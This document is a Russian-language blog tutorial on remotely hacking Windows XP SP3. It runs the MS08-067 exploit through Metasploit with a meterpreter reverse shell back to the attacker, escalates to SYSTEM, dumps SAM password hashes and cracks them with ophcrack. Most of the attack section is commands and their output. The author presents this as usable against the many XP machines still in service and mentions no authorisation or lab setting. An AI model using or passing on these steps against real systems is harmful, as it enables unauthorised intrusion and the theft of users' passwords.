Всем привет!
Давайте сегодня поговорим про взлом Windows XP SP3. Не думайте, что тема про взлом Windows XP уже не актуальна! Еще как актуальна, до сих пор доля на рынке операционных систем Windows XP занимает лидирующие позиции, что позволяет использовать многочисленные эксплоиты. Я остановился на популярном эксплоите MS08_067, о котором вы можете прочитать
здесь. Про статистику и долю на рынке ОС вы можете прочитать
здесь или воспользуйтесь поиском.
Итак, приступим!
Для начала обновим Metasploit:
Запускаем Metasploit:
Вводим команды:
Код:
|
> use windows/smb/ms08_067_netapi
> set rhost 192.168.1.4
> set rport 445
> set lhost 192.168.1.5
> set lport 4444
> set payload windows/meterpreter/reverse_tcp |
- rhost – IP-адрес удаленного пользователя (remote host)
- rport – порт удаленного пользователя (remote port)
- lhost – IP-адрес атакующего (local host)
- lport – порт атакующего (local port)
Проверяем все ли опции заданы:
Убеждаемся, что все в порядке.
Теперь запускаем эксплоит:
Отлично! Мы в системе.
Посмотрим, какими правами мы обладаем, но скорее всего у нас будут права SYSTEM:
Код:
|
meterpreter > getuid
Server username: NT AUTHORITY/SYSTEM |
Иногда бывает, что у атакующего не хватает прав на совершение какого то действия, т.е. он работает под ограниченной учетной записью. И соответственно вылетают такие ошибки, как:
Код:
|
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect. |
Мы можем попробовать поднять наши права в системе командой getsystem:
Код:
|
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY/SYSTEM |
Это было небольшое отступление, идем дальше.
Хорошо, теперь можем делать все что вздумается, но так как мы говорим про удаленный взлом пароля Windows XP, то будем придерживаться плана.
Сейчас нам нужно вывести содержимое базы данных SAM. Для этого воспользуемся командой hashdump:
Код:
|
meterpreter > hashdump
Admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
HelpAssistant:1000:635e6894ad2400afc97d6c747dc0976a:c489103aa4919d38017486860a7e0b2d:::
Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:2a6f7ec01c389c27cb4db76b7b0de220:::
Гость:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: |
Синтаксис вывода такой:
<User_Name>:<User_ID>:<LM Hash>:<NT Hash>:::
Чтобы расшифровать хэшы можно воспользоваться многочисленными онлайн сервисами, например
cmd5.ru. Но я решил убить двух зайцев сразу, поэтому сейчас покажу вам, как это сделать с помощью программы
ophcrack.
Запускаем ophcrack:
Теперь нам необходимо скачать rainbow tables к ней, поэтому переходим по этой
ссылке и скачиваем архив под названием “
XP free small (380MB)“. Для наших экспериментов понадобится только он, но вы можете скачать все, дело ваше. Сохраняем архив с rainbow tables в систему, потом извлекаем. Как разархивировать zip архив в Linux можно прочитать
здесь.
Переходим в ophcrack и нажимаем кнопку
Tables. В появившемся окне выбираем
XP free small, потом нажимаем
Install и выбираем директорию с rainbow таблицами. Я разархивировал их в
/root/tables/.
Когда rainbow таблицы выбраны, нажимаем на кнопку
Load и выбираем пункт
Single hash. Перед вами появится окно (см. рисунок ниже), в котором вводим интересующую вас строку вывода команды hashdump. Я выбрал вот эти строки:
- Admin:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7e aee8fb117ad06bdd830b7586c:::
- Hub-lex:1004:44efce164ab921caaad3b435b51404ee:32ed87bd b5fdc5e9cba88547376818d4:::
Нажимаем кнопку
OK.
Осталось щелкнуть по кнопке
Crack и пароли будут получены.
Вот и все! Как всегда ничего сложного. Дальше будет еще интереснее, поэтому оформляйте подписку по
E-MAIL или
RSS, чтобы следить за выходом новых статей.
Дополнительные материалы:
Источник: www.levinkv.ru